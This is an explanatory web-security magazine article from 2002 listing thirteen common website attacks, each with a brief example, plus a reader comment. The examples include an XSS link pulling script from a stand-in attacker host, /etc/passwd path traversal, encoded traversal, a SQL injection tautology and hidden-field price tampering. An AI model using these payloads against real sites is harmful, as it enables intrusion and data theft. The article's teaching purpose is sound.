Information Security

Defending the digital infrastructure

iSTOCK/GETTY IMAGES

Evaluate Weigh the pros and cons of technologies, products and projects you are considering.

Thirteen website attacks that damage an enterprise's Web presence

Many website attacks are potentially dangerous and can damage an organization's Web presence. Learn about the most common attacks and how they function.

Default Web server installs, no matter the make or model, are susceptible to a plethora of attacks that other services need not be concerned with. Many of these attacks are so simple to launch that anyone with a browser can unleash them. Others require intimate knowledge of the host server and underlying applications. All are potentially damaging to an organization's Web presence.

Obviously, not all of the following attacks work all of the time. However, despite the fact that all of these threats have been well known and documented, new and vulnerable Web sites continue to pour onto the Internet.

  1. Cross-Site Scripting: Malicious code, commonly in the form of a <SCRIPT> tag added to a URL is executed when a user clicks on the URL.
    Example: <ahref=http://www.infosecuritymag.com?bogus=<SCRIPT SRC='http://attacker/script'>Click Me!</a>
  2. Application Buffer Overflow: Very long requests sent to the application exceed the allocated buffers and allow arbitrary code to be placed into the execution stream.
    Example: <input type="text" maxlen="10000000" value="ioH*Y$P;...">
  3. Cookie Poisoning: Changing a cookie's contents to obtain unauthorized information from the server.
    Example: Changing the username stored in a cookie to access other users' records.
  4. Hidden Field Manipulation: Changing the values of hidden fields, which are frequently used to provide status information to the server.
    Example: <input type="hidden" name="price" value="69.99"> changed to <input type="hidden" name="price" value="0.01"> changes the price of an item on a Web-based order form.
  5. Stealth Commanding: Modifying Web form input fields to coerce the Web server into actions it wouldn't ordinarily allow.
    Example: Inserting a script into a text box, allowing it to be executed when the text box is displayed back to the user (for confirmation, for example).
  6. Forceful Browsing: Modifying URL to bypass Web controls.
    Example: http://mysite/Webstuff/../../../etc/passwd
  7. Parameter Tampering: Submitting modified data to the Web server.
    Example: <http://mysite/dbaccess.cgi?memberid=466326> changed to <http://mysite/dbaccess.cgi?memberid=*> returns all member records in the database.
  8. Third-Party Misconfiguration: Exploiting an insecure default (or bad) server configuration.
    Example: Attempting to use default passwords to gain access to Web applications.
  9. Known Vulnerabilities: Exploiting known vulnerabilities that haven't been patched.
    Example: Exploiting IIS vulnerabilities on a "vanilla" installation before it's patched.
  10. Backdoor and Debug Options: Exploiting functions intended for development testing that haven't been removed or disabled.
    Example: <http://mysite/buy.cgi?debug=1>
  11. Database Sabotage: Appending valid SQL commands to form fields.
    Example: On a Web form, if user "bobbitt" enters "mypassword" in the password field, the underlying SQL query might look like this: select * from users where username='bobbitt' and password='mypassword.' However, if an attacker enters "anyoldthing' or '1'='1" in that same password field, the SQL query changes to this: select * from users where username='bobbitt' and password='anyoldthing' or '1'='1' In this situation, 1 is always equal to 1, so the logic of the SQL query is short-circuited, and unauthorized access is obtained.
  12. Data Encoding: Disguising attacks by using alternate encoding methods.
    Example: inserting "%2E%2E%2F" into a URL to hide "../" backtracking requests.
  13. Protocol Piggybacking: Modifying the application protocol structure.
    Example: Inserting a specially crafted proxy-authorization header into an HTTP request.
Article 7 of 11
This was last published in May 2002

Dig Deeper on Web Server Threats and Countermeasures

Join the conversation

1 comment

Send me notifications when other members comment.

Please create a username to comment.

This article seems to be a popularization of Web threats from OWASP Top 10. A good list, and explanation in [almost] layman's term's. I suggest, though, to change the title - it's confusing. These attacks don't just "damage presence", they allow stealing information, removing or corrupting data, and bringing down the web site.
Cancel

Get More Information Security

Access to all of our back issues View All

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly.com

Close